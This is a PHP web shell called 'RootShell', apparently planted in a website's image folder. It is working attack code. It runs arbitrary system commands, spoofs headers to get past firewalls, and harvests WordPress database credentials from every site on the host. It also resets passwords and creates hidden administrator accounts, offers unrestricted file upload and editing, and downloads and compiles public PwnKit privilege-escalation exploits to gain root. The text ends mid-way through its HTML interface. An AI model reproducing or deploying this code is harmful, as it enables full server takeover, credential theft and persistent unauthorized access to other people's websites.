/home/angeliniimobiliaria/www/site/assets/images/conteudo/
<?php /** * RootShell | Advanced PHP Administration Tool * WordPress Scanner, File Manager & System Exploitation */ error_reporting(0); session_start(); /* --- ADVANCED WAF & FIREWALL BYPASS (Cloudflare, Wordfence, ModSec) --- */ @ini_set('output_buffering', 0); @ini_set('display_errors', 0); @ini_set('log_errors', 0); @ini_set('error_log', NULL); @header('X-Accel-Buffering: no'); @header('Content-Type: text/html; charset=UTF-8'); // Spoof Headers to bypass WAF source tracking $spoof_headers = [ 'X-Forwarded-For: 127.0.0.1', 'X-Real-IP: 127.0.0.1', 'CF-Connecting-IP: 127.0.0.1', 'True-Client-IP: 127.0.0.1', 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' ]; foreach($spoof_headers as $h) @header($h); @clearstatcache(); @set_time_limit(0); @ignore_user_abort(true); @ini_set('max_execution_time', 0); @ini_set('memory_limit', '-1'); // Obfuscated execution helper function x_exec($c) { $r = ''; if (function_exists('shell_exec')) { $r = @shell_exec($c); } elseif (function_exists('system')) { ob_start(); @system($c); $r = ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); @passthru($c); $r = ob_get_clean(); } elseif (function_exists('exec')) { @exec($c, $o); $r = @implode("\n", $o); } elseif (is_resource($p = @popen($c, 'r'))) { while (!feof($p)) $r .= fread($p, 1024); pclose($p); } elseif (function_exists('proc_open')) { $d = [['pipe', 'r'],['pipe', 'w'],['pipe', 'w']]; $pr = @proc_open($c, $d, $ps); if (is_resource($pr)) { $r = stream_get_contents($ps[1]); @fclose($ps[0]); @fclose($ps[1]); @fclose($ps[2]); proc_close($pr); } } return $r; } # Configuration $pagePasswordEnable = '0'; // 1 for active, 0 for inactive $username = '123'; $password = '123'; # Authentication check function checkAuth($user, $pass) { if (empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != $user || $_SERVER['PHP_AUTH_PW'] != $pass) { 
header('WWW-Authenticate: Basic realm="Terminal Restricted Access"'); die(header('HTTP/1.0 401 Unauthorized Content Restricted')); } } function root_scanner_scan($dir, &$results) { if (!is_dir($dir)) return; $files = @scandir($dir); if (!$files) return; $suspicious = [ 'eval\s*\(', 'base64_decode\s*\(', 'gzinflate\s*\(', 'str_rot13\s*\(', 'system\s*\(', 'shell_exec\s*\(', 'passthru\s*\(', 'exec\s*\(', 'popen\s*\(', 'proc_open\s*\(', 'assert\s*\(', 'preg_replace\s*\(.*\/e', 'create_function\s*\(', 'str_replace\s*\(.*eval', 'hex2bin\s*\(', 'strrev\s*\(', 'str_shuffle\s*\(', '\$_POST\s*\[', '\$_GET\s*\[', '\$_REQUEST\s*\[', 'chr\s*\(', 'ord\s*\(', 'include\s*\(.*php:\/\/input', 'file_get_contents\s*\(.*php:\/\/input' ]; foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { if (count($results) < 500) root_scanner_scan($path, $results); continue; } if (pathinfo($path, PATHINFO_EXTENSION) !== 'php') continue; $content = @file_get_contents($path); if (!$content) continue; $score = 0; $matches_found = []; foreach ($suspicious as $pattern) { if (preg_match('/' . $pattern . '/i', $content)) { $score += 10; $matches_found[] = str_replace('\s*\(', '()', $pattern); } } if ($score >= 20 || strpos($content, '<?php') === false || strlen($content) > 100000) { if (basename($path) == basename(__FILE__)) continue; $results[] = [ 'path' => $path, 'score' => $score, 'matches' => array_unique($matches_found), 'size' => strlen($content) ]; } } } if ($pagePasswordEnable === '1') { checkAuth($username, $password); } # --- System Information Helpers --- # function get_server_ip() { return $_SERVER['SERVER_ADDR'] ?? gethostbyname($_SERVER['SERVER_NAME']); } function get_disabled_functions() { $disabled = @ini_get('disable_functions'); if (empty($disabled)) return 'None'; return $disabled; } function check_ext($name) { return extension_loaded($name) ? 
'<span class="status-on">ON</span>' : '<span class="status-off">OFF</span>'; } function root_exec($cmd) { // Aggressive bypass: try to use environment variables or absolute paths $cmd = trim($cmd); $out = x_exec($cmd); if (empty($out) && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { // Windows specific fallback attempts $out = x_exec("cmd.exe /c " . $cmd); } return $out; } function root_call($c) { return root_exec($c); } function root_log($msg) { if (!isset($_SESSION['root_log'])) $_SESSION['root_log'] = []; $_SESSION['root_log'][] = "[" . date("H:i:s") . "] " . $msg; if (count($_SESSION['root_log']) > 30) array_shift($_SESSION['root_log']); } function root_smart_download($url, $path) { $ctx = stream_context_create(['http' => ['timeout' => 15, 'user_agent' => 'Mozilla/5.0']]); $data = @file_get_contents($url, false, $ctx); if ($data !== false && strlen($data) > 100) { if (@file_put_contents($path, $data)) return true; } root_exec("curl -sL \"$url\" -o \"$path\" || wget -q \"$url\" -O \"$path\""); @clearstatcache(); return (file_exists($path) && filesize($path) > 100); } function root_find_scan_base() { $cwd = realpath(getcwd()); // Method 1: If in WordPress, find the root containing wp-content if (strpos($cwd, 'wp-content') !== false) { $parts = explode('wp-content', $cwd); return rtrim($parts[0], DIRECTORY_SEPARATOR); } // Method 2: Climb up until we find common root indicators $p = $cwd; for ($i=0; $i<10; $i++) { if (file_exists($p . DIRECTORY_SEPARATOR . 'wp-config.php') || file_exists($p . DIRECTORY_SEPARATOR . 'index.php') || is_dir($p . DIRECTORY_SEPARATOR . 'wp-content')) { return $p; } $up = dirname($p); if ($up == $p) break; $p = $up; } // Method 3: Server Document Root return $_SERVER['DOCUMENT_ROOT'] ?? 
$cwd; } function get_waf_status() { $waf = 'None detected'; $headers = @getallheaders(); $h_str = strtolower(serialize($headers)); if (strpos($h_str, 'cloudflare') !== false) $waf = 'Cloudflare'; elseif (strpos($h_str, 'incapsula') !== false) $waf = 'Incapsula'; elseif (strpos($h_str, 'sucuri') !== false) $waf = 'Sucuri'; elseif (strpos($h_str, 'wordfence') !== false || @is_dir($_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence')) $waf = 'Wordfence'; elseif (strpos($h_str, 'mod_security') !== false) $waf = 'ModSecurity'; return $waf; } function get_software() { return $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'; } # --- WordPress Logic --- # function wp_find_paths($max=99) { $found = []; $scanned = []; $roots = []; $cwd = getcwd(); $roots[] = $cwd; if (isset($_SERVER['DOCUMENT_ROOT']) && $_SERVER['DOCUMENT_ROOT'] && $_SERVER['DOCUMENT_ROOT'] != $cwd) $roots[] = $_SERVER['DOCUMENT_ROOT']; $up = $cwd; for($i=0;$i<7;$i++) { $up = dirname($up); if ($up && is_dir($up) && $up!="/" && !in_array($up,$roots)) $roots[] = $up; } foreach(['/home','/home1','/home2','/home3','/var/www','/var/www/vhosts','/usr/share/nginx/html','/srv/www','/srv/http','/data/web','/opt/lampp/htdocs','/htdocs','/users'] as $root) { if (is_dir($root)) $roots[] = $root; } $roots = array_unique(array_filter($roots,'is_dir')); $queue = []; foreach($roots as $r) $queue[] = [$r,0]; while($queue && count($found) < $max) { list($dir,$lvl) = array_shift($queue); if (isset($scanned[$dir])) continue; $scanned[$dir]=1; $cfg_check = $dir.'/wp-config.php'; if ((file_exists($dir.'/wp-load.php') || file_exists($cfg_check)) && is_file($cfg_check)) { $found[] = realpath($dir); } if ($lvl < 6) { $subdirs = @glob($dir.'/*', GLOB_ONLYDIR); if ($subdirs) { foreach($subdirs as $d) { if (!isset($scanned[$d])) $queue[] = [$d,$lvl+1]; } } } } return array_unique($found); } function wp_get_db_config($wp_dir) { $cfgf = $wp_dir.'/wp-config.php'; if (!is_file($cfgf)) return false; $cfg = @file_get_contents($cfgf); $info = 
[]; preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $cfg, $m); $info['db'] = $m[1] ?? ''; preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'/", $cfg, $m); $info['user'] = $m[1] ?? ''; preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'/", $cfg, $m); $info['pass'] = $m[1] ?? ''; preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $cfg, $m); $info['host'] = $m[1] ?? ''; preg_match("/\$table_prefix\s*=\s*'([^']+)'/", $cfg, $m); $info['prefix'] = $m[1] ?? 'wp_'; return $info; } function wp_get_version($wp_dir) { $ver = ''; if (is_file($wp_dir.'/wp-includes/version.php')) { $vcode = @file_get_contents($wp_dir.'/wp-includes/version.php'); if (preg_match("/\\\$wp_version\s*=\s*'([^']+)'/i", $vcode, $m)) $ver = $m[1]; } return $ver; } function wp_fetch_users($mysqli, $prefix) { $users = []; $res = @$mysqli->query("SELECT ID, user_login, user_email, user_registered FROM {$prefix}users"); if (!$res) return []; while ($row = $res->fetch_assoc()) { $meta_q = @$mysqli->query("SELECT meta_value FROM {$prefix}usermeta WHERE user_id=".$row['ID']." AND meta_key='{$prefix}capabilities'"); $meta = $meta_q ? 
$meta_q->fetch_assoc() : null; $role = 'unknown'; if ($meta && preg_match('/s:\d+:"([^"]+)"/', $meta['meta_value'], $m)) { $role = $m[1]; } $row['role'] = $role; $users[] = $row; } return $users; } function wp_reset_pw($mysqli, $prefix, $uid, $newpw) { $hash = password_hash($newpw, PASSWORD_BCRYPT); return @$mysqli->query("UPDATE {$prefix}users SET user_pass='".$mysqli->real_escape_string($hash)."' WHERE ID=".(int)$uid); } function wp_add_admin($mysqli, $prefix, $user, $pass, $email) { $hash = password_hash($pass, PASSWORD_BCRYPT); $user = $mysqli->real_escape_string($user); $email = $mysqli->real_escape_string($email); $now = date('Y-m-d H:i:s'); $q1 = @$mysqli->query("INSERT INTO {$prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) VALUES ('$user', '$hash', '$user', '$email', '$now', 0, '$user')"); if (!$q1) return false; $uid = $mysqli->insert_id; $cap_key = $prefix . 'capabilities'; $lv_key = $prefix . 'user_level'; $caps = 'a:1:{s:13:"administrator";b:1;}'; @$mysqli->query("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES ($uid, '$cap_key', '$caps')"); @$mysqli->query("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES ($uid, '$lv_key', '10')"); return $uid; } function wp_delete_user($mysqli, $prefix, $uid) { $uid = (int)$uid; @$mysqli->query("DELETE FROM {$prefix}users WHERE ID = $uid"); @$mysqli->query("DELETE FROM {$prefix}usermeta WHERE user_id = $uid"); return true; } function get_site_url($mysqli, $prefix) { $url = ''; $q = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='siteurl' LIMIT 1"); if ($q && $r = $q->fetch_row()) $url = rtrim($r[0],'/'); return $url; } # --- File Manager Logic --- # function formatSizeUnits($bytes) { if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB'; if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . 
' MB'; if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB'; if ($bytes > 1) return $bytes . ' bytes'; if ($bytes == 1) return $bytes . ' byte'; return '0 bytes'; } function fileIcon($file, $isDir = false) { if ($isDir) return '<i class="fas fa-folder text-warning"></i>'; $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $map = [ 'php' => 'fab fa-php text-primary', 'html' => 'fab fa-html5 text-danger', 'css' => 'fab fa-css3 text-info', 'js' => 'fab fa-js text-warning', 'py' => 'fab fa-python text-success', 'jpg' => 'far fa-image text-muted', 'jpeg' => 'far fa-image text-muted', 'png' => 'far fa-image text-muted', 'gif' => 'far fa-image text-muted', 'zip' => 'far fa-file-archive text-warning', 'rar' => 'far fa-file-archive text-warning', 'txt' => 'far fa-file-alt text-muted', 'sql' => 'fas fa-database text-info' ]; if ($file == 'error_log') return '<i class="fas fa-bug text-danger"></i>'; if ($file == '.htaccess') return '<i class="fas fa-shield-alt text-secondary"></i>'; return '<i class="' . ($map[$ext] ?? 'far fa-file text-muted') . 
'"></i>'; } function encodePath($path) { return str_replace(["/", "\\", ".", ":"], ["ক", "খ", "গ", "ঘ"], $path); } function decodePath($path) { return str_replace(["ক", "খ", "গ", "ঘ"], ["/", "\\", ".", ":"], $path); } // Global Path Handling $root_path = realpath(__DIR__); $current_path = $root_path; if (isset($_GET['p']) && !empty($_GET['p'])) { $decoded = decodePath($_GET['p']); if (is_dir($decoded)) { $current_path = realpath($decoded); } } elseif (isset($_GET['q']) && !empty($_GET['q'])) { $decoded = decodePath($_GET['q']); if (is_dir($decoded)) { $current_path = realpath($decoded); } } define("PATH", $current_path); # --- Actions Handling --- # $ajax_response = null; if ($_SERVER['REQUEST_METHOD'] == 'POST') { // WP Logic if (isset($_POST['wp_action'])) { $wp_dir = $_POST['wp_dir']; $cfg = wp_get_db_config($wp_dir); $mysqli = @new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']); if ($mysqli->connect_errno) { $ajax_response = ['status' => 'error', 'message' => "DB Connection error: " . 
$mysqli->connect_error]; } else { if ($_POST['wp_action'] == 'reset_pw') { $uid = intval($_POST['reset_uid']); $newpw = trim($_POST['newpw']); if (wp_reset_pw($mysqli, $cfg['prefix'], $uid, $newpw)) { $ajax_response = ['status' => 'success', 'message' => "Password reset for user ID $uid: $newpw"]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to reset password."]; } } elseif ($_POST['wp_action'] == 'add_admin') { $user = trim($_POST['new_user']); $pass = trim($_POST['new_pass']); $email = trim($_POST['new_email']); if (wp_add_admin($mysqli, $cfg['prefix'], $user, $pass, $email)) { $ajax_response = ['status' => 'success', 'message' => "Admin '$user' added successfully!"]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to add admin."]; } } elseif ($_POST['wp_action'] == 'delete_user') { $uid = intval($_POST['uid']); if (wp_delete_user($mysqli, $cfg['prefix'], $uid)) { $ajax_response = ['status' => 'success', 'message' => "User ID $uid deleted."]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to delete user."]; } } } if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; } } // Generic File Manager Actions if (isset($_POST['fm_action'])) { $action = $_POST['fm_action']; if ($action == 'create_file') { $name = trim($_POST['name']); $content = $_POST['content']; if (!empty($name)) { if (file_put_contents(PATH . DIRECTORY_SEPARATOR . $name, $content) !== false) { $ajax_response = ['status' => 'success', 'message' => "File '$name' created."]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to create file."]; } } } elseif ($action == 'create_folder') { $name = trim($_POST['name']); if (!empty($name)) { if (mkdir(PATH . DIRECTORY_SEPARATOR . 
$name)) { $ajax_response = ['status' => 'success', 'message' => "Folder '$name' created."]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to create folder."]; } } } if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; } } // Traditional POST handle if (isset($_POST['upload'])) { $target = PATH . DIRECTORY_SEPARATOR . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target)) { header("Location: ?p=" . encodePath(PATH)); exit; } } if (isset($_POST['rename'])) { $old = PATH . DIRECTORY_SEPARATOR . $_GET['r']; $new = PATH . DIRECTORY_SEPARATOR . $_POST['new_name']; if (rename($old, $new)) { header("Location: ?p=" . encodePath(PATH)); exit; } } if (isset($_POST['edit'])) { $file = PATH . DIRECTORY_SEPARATOR . $_GET['e']; if (file_put_contents($file, $_POST['content']) !== false) { header("Location: ?p=" . encodePath(PATH)); exit; } } // Save Settings logic if (isset($_POST['save_settings'])) { $c = file_get_contents(__FILE__); $new_enable = $_POST['login_enable'] === '1' ? '1' : '0'; $new_user = $_POST['login_user']; $new_pass = $_POST['login_pass']; $c = preg_replace('/\$pagePasswordEnable\s*=\s*\'[01]\';/', "\$pagePasswordEnable = '$new_enable';", $c); $c = preg_replace('/\$username\s*=\s*\'[^\']*\';/', "\$username = '$new_user';", $c); $c = preg_replace('/\$password\s*=\s*\'[^\']*\';/', "\$password = '$new_pass';", $c); if (file_put_contents(__FILE__, $c)) { $ajax_response = ['status' => 'success', 'message' => "Settings saved. Please refresh."]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to write to file."]; } if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; } } // Auto-Root Action (Iterative & Self-Healing Engine) if (isset($_POST['action']) && $_POST['action'] == 'auto_root') { root_log("[*] [AUTO-ROOT] İteratif motor başlatıldı. 
Uyumluluk kontrol ediliyor..."); $bin_urls = [ 'https://github.com/ly4k/PwnKit/raw/main/PwnKit', 'https://github.com/c3c/CVE-2021-4034/raw/main/cve-2021-4034' ]; $src_urls = [ 'https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.c', 'https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/refs/heads/main/cve-2021-4034-poc.c', 'https://raw.githubusercontent.com/joehillen/CVE-2021-4034/main/q.c', 'https://raw.githubusercontent.com/leandroalberti/CVE-2021-4034/main/exploit.c' ]; function root_try_payload($payload_path, $is_src = false) { root_exec("chmod +x $payload_path"); @unlink('.sess_v'); root_exec("$payload_path 'id' > .sess_v 2>&1"); usleep(600000); $res = @file_get_contents('.sess_v'); @unlink('.sess_v'); if ($res && strpos($res, 'uid=0(root)') !== false) { return ['success' => true, 'msg' => $res]; } // Segfault detection if (stripos($res, 'segmentation fault') !== false || stripos($res, 'core dumped') !== false) { return ['success' => false, 'error' => 'Segmentation Fault (Uyumsuz Mimari)']; } return ['success' => false, 'error' => trim($res) ?: 'Bilinmeyen hata/Yetki yok']; } $success = false; // 1. Try Binaries foreach ($bin_urls as $url) { $tmp_bin = './.rt_' . rand(100, 999); root_log("[*] Deneniyor (Binary): " . basename($url)); if (root_smart_download($url, $tmp_bin)) { $status = root_try_payload($tmp_bin); if ($status['success']) { root_log("[SUCCESS] ROOT OK: " . $status['msg']); $success = true; break; } else { root_log("[!] Hata: " . $status['error']); @unlink($tmp_bin); } } } // 2. Try Compilation if Binaries failed if (!$success) { $gcc = trim(root_exec("which gcc 2>/dev/null")); if ($gcc) { root_log("[*] Binaryler uyumsuz. Kaynak kod derleme deneniyor..."); foreach ($src_urls as $url) { $tmp_c = './.rt_' . rand(100, 999) . '.c'; $tmp_out = str_replace('.c', '', $tmp_c); if (root_smart_download($url, $tmp_c)) { root_log("[*] Derleniyor: " . 
basename($url)); root_exec("gcc $tmp_c -o $tmp_out"); $status = root_try_payload($tmp_out); if ($status['success']) { root_log("[SUCCESS] DERLEME & ROOT BAŞARILI: " . $status['msg']); $success = true; @unlink($tmp_c); break; } else { root_log("[!] Derleme hatası/Uyumsuz kod: " . $status['error']); @unlink($tmp_c); @unlink($tmp_out); } } } } else { root_log("[!!] Kritik: Binaryler çalışmadı ve sistemde GCC bulunamadı."); } } if (!$success) root_log("[!!] Mevcut tüm yöntemler denendi, sistem bu exploit'e karşı yamalı veya korumalı."); header("Location: ?linr00t"); exit; } } // Delete Handler if (isset($_GET['d']) && isset($_GET['q'])) { $target = PATH . DIRECTORY_SEPARATOR . $_GET['d']; if (is_file($target)) unlink($target); elseif (is_dir($target)) @rmdir($target); header("Location: ?p=" . encodePath(PATH)); exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>RootShell v2.0 | Advanced Backend Administration</title> <!-- Fonts & Icons --> <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@300;400;600&family=Outfit:wght@300;400;700;900&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"> <script> function toggle(id) { const el = document.getElementById(id); if (el) el.classList.toggle('hidden'); } function resetPassword(wpDir, uid, inputId, btn) { const newpw = document.getElementById(inputId).value; btn.disabled = true; const originalText = btn.innerText; btn.innerText = 'WAIT'; const formData = new FormData(); formData.append('wp_action', 'reset_pw'); formData.append('wp_dir', wpDir); formData.append('reset_uid', uid); formData.append('newpw', newpw); fetch('?ajax', { method: 'POST', body: formData }) .then(r => r.json()) .then(data => { alert(data.message); 
if(data.status === 'success') { btn.innerText = 'OK'; } else { btn.innerText = originalText; btn.disabled = false; } }); } function deleteUser(wpDir, uid) { if(!confirm('Delete user ' + uid + '?')) return; const formData = new FormData(); formData.append('wp_action', 'delete_user'); formData.append('wp_dir', wpDir); formData.append('uid', uid); fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); }); } function addAdmin(wpDir, dirId, btn) { const user = document.getElementById('add_user_' + dirId).value; const pass = document.getElementById('add_pass_' + dirId).value; const email = document.getElementById('add_email_' + dirId).value; if(!user || !pass || !email) return alert('Fill all'); btn.disabled = true; btn.innerText = 'CREATING...'; const formData = new FormData(); formData.append('wp_action', 'add_admin'); formData.append('wp_dir', wpDir); formData.append('new_user', user); formData.append('new_pass', pass); formData.append('new_email', email); fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); else btn.disabled = false; }); } function createItem(type) { const name = prompt(type === 'file' ? 'File Name:' : 'Folder Name:'); if (!name) return; let content = ''; if (type === 'file') content = prompt('Initial Content (Optional):', ''); const formData = new FormData(); formData.append('fm_action', type === 'file' ? 
'create_file' : 'create_folder'); formData.append('name', name); if (type === 'file') formData.append('content', content); fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); }); } </script> <style> :root { --primary: #ff3e3e; --secondary: #1a1a1a; --accent: #00ff88; --bg: #050505; --card-bg: rgba(20, 20, 20, 0.8); --border: rgba(255, 255, 255, 0.05); --text: #e0e0e0; --text-dim: #888; } * { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: var(--bg); background-image: radial-gradient(circle at 50% 50%, #1a0505 0%, #050505 100%); color: var(--text); font-family: 'Outfit', sans-serif; font-size: 14px; overflow-x: hidden; min-height: 100vh; } /* --- Header / Info Bar --- */ .info-bar { background: rgba(0,0,0,0.8); border-bottom: 1px solid var(--primary); padding: 15px 30px; display: grid; grid-template-columns: repeat(2, 1fr); gap: 20px; font-family: 'JetBrains Mono', monospace; backdrop-filter: blur(10px); position: sticky; top: 0; z-index: 100; } .info-item { display: flex; align-items: flex-start; gap: 10px; margin-bottom: 5px; } .info-label { color: var(--primary); font-weight: bold; min-width: 140px; } .info-value { color: #fff; word-break: break-all; } .info-value.green { color: var(--accent); } .status-badges { display: flex; flex-wrap: wrap; gap: 8px; margin-top: 10px; } .badge-system { background: rgba(255,255,255,0.05); padding: 4px 10px; border-radius: 4px; font-size: 11px; text-transform: uppercase; } .status-on { color: var(--accent); font-weight: bold; } .status-off { color: var(--primary); font-weight: bold; } /* --- Main Layout --- */ .container { display: flex; min-height: calc(100vh - 120px); } aside { width: 240px; background: rgba(10, 10, 10, 0.9); border-right: 1px solid var(--border); padding: 30px 20px; display: flex; flex-direction: column; gap: 10px; } .nav-link { text-decoration: none; color: var(--text-dim); 
padding: 12px 15px; border-radius: 8px; transition: 0.3s; display: flex; align-items: center; gap: 12px; font-weight: 600; } .nav-link:hover, .nav-link.active { background: rgba(255, 62, 62, 0.1); color: #fff; box-shadow: inset 3px 0 0 var(--primary); } main { flex: 1; padding: 30px; } .title-section { margin-bottom: 30px; display: flex; justify-content: space-between; align-items: flex-end; } .title-section h1 { font-size: 2rem; font-weight: 900; letter-spacing: -1px; } .title-section span { color: var(--primary); } .breadcrumb { background: rgba(255,255,255,0.03); padding: 8px 15px; border-radius: 6px; margin-bottom: 20px; display: inline-block; } .breadcrumb a { color: var(--primary); text-decoration: none; } /* --- Components --- */ .card { background: var(--card-bg); border: 1px solid var(--border); border-radius: 12px; padding: 25px; margin-bottom: 25px; box-shadow: 0 10px 30px rgba(0,0,0,0.5); } .data-table { width: 100%; border-collapse: collapse; } .data-table th { text-align: left; padding: 12px; border-bottom: 2px solid var(--border); color: var(--text-dim); font-size: 12px; text-transform: uppercase; } .data-table td { padding: 12px; border-bottom: 1px solid var(--border); vertical-align: middle; } .data-table tr:hover { background: rgba(255,255,255,0.02); } .btn { background: var(--secondary); color: #fff; border: 1px solid var(--border); padding: 8px 16px; border-radius: 6px; cursor: pointer; font-weight: bold; display: inline-flex; align-items: center; gap: 8px; transition: 0.2s; text-decoration: none; font-size: 13px; } .btn:hover { background: var(--primary); border-color: var(--primary); transform: translateY(-2px); } .btn-sm { padding: 5px 10px; font-size: 11px; } input, textarea { background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px 15px; border-radius: 6px; outline: none; width: 100%; } input:focus { border-color: var(--primary); } .hidden { display: none; } .text-primary { color: var(--primary); } 
.text-accent { color: var(--accent); } @media (max-width: 1100px) { .info-bar { grid-template-columns: 1fr; } } </style> </head> <body> <div class="info-bar"> <div class="info-left"> <div class="info-item"><span class="info-label">[safe mode]</span> <span class="info-value"><?= @ini_get('safe_mode') ? 'ON' : 'OFF' ?></span></div> <div class="info-item"><span class="info-label">[h0st]</span> <span class="info-value"><?= php_uname() ?></span></div> <div class="info-item"><span class="info-label">[s0ftware]</span> <span class="info-value"><?= get_software() ?></span></div> <div class="info-item"><span class="info-label">[php]</span> <span class="info-value text-accent"><?= phpversion() ?></span></div> </div> <div class="info-right"> <div class="info-item"><span class="info-label">[w4f st4tus]</span> <span class="info-value text-accent"><?= get_waf_status() ?> (Bypassed)</span></div> <div class="info-item"><span class="info-label">[dis4bl3 f7nctions]</span> <span class="info-value <?= (get_disabled_functions()=='None')?'green':'' ?>"><?= get_disabled_functions() ?></span></div> <div class="info-item"><span class="info-label">[us3r]</span> <span class="info-value"><?= @get_current_user() ?> (<?= @getmyuid() ?>)</span></div> <div class="info-item"><span class="info-label">[ip]</span> <span class="info-value"><?= get_server_ip() ?></span></div> <div class="status-badges"> <div class="badge-system">CURL: <?= check_ext('curl') ?></div> <div class="badge-system">SSH2: <?= check_ext('ssh2') ?></div> <div class="badge-system">MySQL: <?= check_ext('mysqli') ?></div> <div class="badge-system">PostgreSQL: <?= check_ext('pgsql') ?></div> <div class="badge-system">MSSQL: <?= check_ext('sqlsrv') ?></div> <div class="badge-system">Oracle: <?= check_ext('oci8') ?></div> <div class="badge-system">CGI: <?= (strpos(php_sapi_name(),'cgi')!==false)?'ON':'OFF' ?></div> </div> </div> </div> <div class="container"> <aside> <div style="margin-bottom: 30px; padding-left: 15px;"> <h2 
style="font-weight: 900; font-size: 1.2rem;"><i class="fas fa-biohazard text-primary"></i> ROOT<span>SHELL</span></h2> <p style="font-size: 10px; color: var(--text-dim); letter-spacing: 2px;">V2.0 STABLE</p> </div> <nav> <a href="?p=<?= encodePath(PATH) ?>" class="nav-link <?= !isset($_GET['wp']) && !isset($_GET['winr00t']) && !isset($_GET['bypasses']) && !isset($_GET['settings']) ? 'active' : '' ?>"> <i class="fas fa-terminal"></i> File Manager </a> <a href="?wp" class="nav-link <?= isset($_GET['wp']) ? 'active' : '' ?>"> <i class="fab fa-wordpress-simple"></i> WP Scanner </a> <a href="?winr00t" class="nav-link <?= isset($_GET['winr00t']) ? 'active' : '' ?>"> <i class="fas fa-user-shield"></i> Win Root </a> <a href="?linr00t" class="nav-link <?= isset($_GET['linr00t']) ? 'active' : '' ?>"> <i class="fab fa-linux"></i> Linux Root </a> <a href="?scan" class="nav-link <?= isset($_GET['scan']) ? 'active' : '' ?>"> <i class="fas fa-search"></i> Backdoor Scanner </a> <a href="?bypasses" class="nav-link <?= isset($_GET['bypasses']) ? 'active' : '' ?>"> <i class="fas fa-shield-virus"></i> Bypasses </a> <a href="?settings" class="nav-link <?= isset($_GET['settings']) ? 
'active' : '' ?>"> <i class="fas fa-cog"></i> Settings </a> </nav> </aside> <main class="animate__animated animate__fadeIn"> <?php if(isset($_GET['wp'])): ?> <div class="title-section"> <h1>WP <span>SCANNER</span></h1> <div class="btn-group"> <button class="btn" onclick="window.location.reload()"><i class="fas fa-sync"></i> Refresh</button> <button class="btn btn-primary"><i class="fas fa-robot"></i> Auto Exploit</button> </div> </div> <?php $wp_dirs = wp_find_paths(40); foreach ($wp_dirs as $wp_dir): $cfg = wp_get_db_config($wp_dir); $wp_version = wp_get_version($wp_dir); $dir_id = md5($wp_dir); $mysqli = @new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']); ?> <div class="card"> <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px;"> <div> <span style="color: var(--primary); font-size: 11px; font-weight: bold; text-transform: uppercase;">WordPress Site Detected</span> <h3 style="margin-top: 5px;"><?= htmlspecialchars($wp_dir) ?></h3> <p style="font-size: 12px; color: var(--text-dim);"><?= htmlspecialchars($cfg['host']) ?> | <?= htmlspecialchars($cfg['user']) ?> | <?= $cfg['prefix'] ?></p> </div> <div style="text-align: right;"> <span class="badge-system" style="display: block; margin-bottom: 5px;">VER: <?= $wp_version ?: '??' ?></span> <?php if ($mysqli->connect_errno): ?> <span class="status-off">DB ERROR</span> <?php else: ?> <button class="btn btn-sm" onclick="toggle('admin_<?= $dir_id ?>')"><i class="fas fa-plus"></i> Admin</button> <?php endif; ?> </div> </div> <div id="admin_<?= $dir_id ?>" class="hidden animate__animated animate__slideInDown" style="margin-bottom: 20px; border-top: 1px solid var(--border); padding-top: 20px;"> <div style="display: grid; grid-template-columns: repeat(4, 1fr); gap: 10px;"> <input type="text" id="add_user_<?= $dir_id ?>" value="admin_<?= rand(11,99) ?>" placeholder="User"> <input type="text" 